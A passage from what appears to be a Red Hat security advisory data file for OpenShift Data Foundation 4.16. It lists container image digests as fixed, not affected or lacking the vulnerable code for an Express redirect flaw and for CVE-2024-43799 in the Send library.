"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", 